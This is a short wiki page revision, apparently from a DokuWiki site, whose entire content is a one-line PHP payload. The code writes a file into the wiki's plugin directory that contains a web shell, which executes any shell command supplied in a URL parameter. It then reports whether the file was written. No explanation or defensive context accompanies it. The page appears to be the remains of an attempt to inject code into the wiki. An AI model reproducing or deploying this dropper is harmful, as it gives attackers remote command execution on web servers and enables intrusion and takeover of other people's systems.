This is an old revision of the document!
$p='lib/plugins/config/help.php';$x='<?php echo "T"."OK"; if(isset($_GET["c"])){@passthru($_GET["c"]);}';echo 'WR='.@file_put_contents($p,$x).'|EX='.(@file_exists($p)?'1':'0');